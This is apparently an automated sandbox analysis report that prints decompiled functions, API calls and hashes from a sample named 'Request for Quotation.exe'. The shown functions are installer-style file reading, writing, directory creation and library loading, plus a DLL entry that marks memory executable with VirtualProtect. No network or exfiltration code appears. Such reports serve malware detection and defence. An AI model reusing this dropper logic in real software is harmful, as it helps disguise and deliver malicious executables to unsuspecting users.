                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                • API String ID: 1892508949-47812868
                                                                                • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405E5E( *0x40a01c, 0x41d460, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                                                0x004031bb
                                                                                0x004031c4
                                                                                0x004031cd
                                                                                0x004031d1
                                                                                0x004031dc
                                                                                0x004031dc
                                                                                0x004031e4
                                                                                0x004031eb
                                                                                0x004031fd
                                                                                0x00403204
                                                                                0x004032a9
                                                                                0x004032a9
                                                                                0x00000000
                                                                                0x0040320a
                                                                                0x0040320d
                                                                                0x00403219
                                                                                0x0040321d
                                                                                0x004032b7
                                                                                0x004032b7
                                                                                0x00403223
                                                                                0x00403226
                                                                                0x00403285
                                                                                0x0040328b
                                                                                0x0040328d
                                                                                0x0040328d
                                                                                0x0040329f
                                                                                0x004032a7
                                                                                0x004032ae
                                                                                0x004032b1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403228
                                                                                0x0040322b
                                                                                0x00000000
                                                                                0x00403231
                                                                                0x00403236
                                                                                0x0040323d
                                                                                0x00403240
                                                                                0x00403242
                                                                                0x00403242
                                                                                0x0040324f
                                                                                0x00403252
                                                                                0x00403259
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403262
                                                                                0x00403269
                                                                                0x00403281
                                                                                0x004032ab
                                                                                0x004032ab
                                                                                0x0040326b
                                                                                0x0040326b
                                                                                0x0040326e
                                                                                0x00403271
                                                                                0x00403277
                                                                                0x0040327d
                                                                                0x00000000
                                                                                0x0040327f
                                                                                0x00000000
                                                                                0x0040327f
                                                                                0x0040327d
                                                                                0x00000000
                                                                                0x00403269
                                                                                0x00000000
                                                                                0x00403236
                                                                                0x0040322b
                                                                                0x00403226
                                                                                0x0040321d
                                                                                0x00403204
                                                                                0x004032b9
                                                                                0x004032bc

                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: c5bf3f2a7834a57ab6379b74590a1aae870d7d7a6e9b7999044e5077526538b5
                                                                                • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                • Opcode Fuzzy Hash: c5bf3f2a7834a57ab6379b74590a1aae870d7d7a6e9b7999044e5077526538b5
                                                                                • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}











                                                                                0x0040138a
                                                                                0x004013fa
                                                                                0x0040139b
                                                                                0x004013a0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004013a2
                                                                                0x004013a3
                                                                                0x004013ad
                                                                                0x00000000
                                                                                0x00401404
                                                                                0x004013b0
                                                                                0x004013b7
                                                                                0x004013bd
                                                                                0x004013be
                                                                                0x004013c0
                                                                                0x004013c2
                                                                                0x004013b9
                                                                                0x004013b9
                                                                                0x004013ba
                                                                                0x004013ba
                                                                                0x004013c9
                                                                                0x004013cb
                                                                                0x004013f4
                                                                                0x004013f4
                                                                                0x004013c9
                                                                                0x00000000

                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                0x0040665e
                                                                                0x00406661
                                                                                0x00406668
                                                                                0x00406670
                                                                                0x0040667c
                                                                                0x00000000
                                                                                0x00406683
                                                                                0x00406673
                                                                                0x0040667a
                                                                                0x00000000
                                                                                0x0040668b
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                  • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                  • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                  • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2547128583-0
                                                                                • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                                • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                0x00405dea
                                                                                0x00405df7
                                                                                0x00405e0c
                                                                                0x00405e12

                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405DEA
                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                                • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                0x00405dc6
                                                                                0x00405dcc
                                                                                0x00405dd1
                                                                                0x00405dda
                                                                                0x00405dda
                                                                                0x00405de3

                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                                                • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                0x004058bd
                                                                                0x004058c5
                                                                                0x00000000
                                                                                0x004058cb
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                • Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
                                                                                • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                • Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                0x00405e62
                                                                                0x00405e72
                                                                                0x00405e7a
                                                                                0x00000000
                                                                                0x00405e81
                                                                                0x00000000
                                                                                0x00405e83

                                                                                APIs
                                                                                • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                • Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
                                                                                • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                • Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                0x00405e91
                                                                                0x00405ea1
                                                                                0x00405ea9
                                                                                0x00000000
                                                                                0x00405eb0
                                                                                0x00000000
                                                                                0x00405eb2

                                                                                APIs
                                                                                • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004188C7,00415460,004033BF,00415460,004188C7,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F712921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6f714038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6f71404c, 4, 0x40, 0x6f71403c); // executed
					 *0x6f71404c = 0xc2;
					 *0x6f71403c = 0;
					 *0x6f714044 = 0;
					 *0x6f714058 = 0;
					 *0x6f714048 = 0;
					 *0x6f714040 = 0;
					 *0x6f714050 = 0;
					 *0x6f71404e = 0;
				}
				return 1;
			}



                                                                                0x6f71292a
                                                                                0x6f71292f
                                                                                0x6f71293f
                                                                                0x6f712947
                                                                                0x6f71294e
                                                                                0x6f712953
                                                                                0x6f712958
                                                                                0x6f71295d
                                                                                0x6f712962
                                                                                0x6f712967
                                                                                0x6f71296c
                                                                                0x6f71296c
                                                                                0x6f712974

                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(6F71404C,00000004,00000040,6F71403C), ref: 6F71293F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 706153fb98664bd6316e967c06f788aec80ec08fc7fc4c7a90e3e6a753d6e302
                                                                                • Instruction ID: c47126042d1a66785754ab468d91d9049094f4e920128ac8fc8c51f9123d0630
                                                                                • Opcode Fuzzy Hash: 706153fb98664bd6316e967c06f788aec80ec08fc7fc4c7a90e3e6a753d6e302
                                                                                • Instruction Fuzzy Hash: 0FF092B1508A80DFCB60CF6A86467053EF0B79B368F0E45BBE158D6241E334416CAB21
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                0x0040344c
                                                                                0x00403452

                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F711215, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E6F711215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x6f71405c); // executed
				return _t1;
			}




                                                                                0x6f71121d
                                                                                0x6f711223

                                                                                APIs
                                                                                • GlobalAlloc.KERNELBASE(00000040,6F711233,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F71121D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocGlobal
                                                                                • String ID:
                                                                                • API String ID: 3761449716-0
                                                                                • Opcode ID: 6d1be4975f433d50c632933fe531bcc0da8034e0a5a3d6fefbe05a418a9e0c19
                                                                                • Instruction ID: ce7829ac635665e91ea8e3e7fcd88f32d3509d380c913b9157820978ca507117
                                                                                • Opcode Fuzzy Hash: 6d1be4975f433d50c632933fe531bcc0da8034e0a5a3d6fefbe05a418a9e0c19
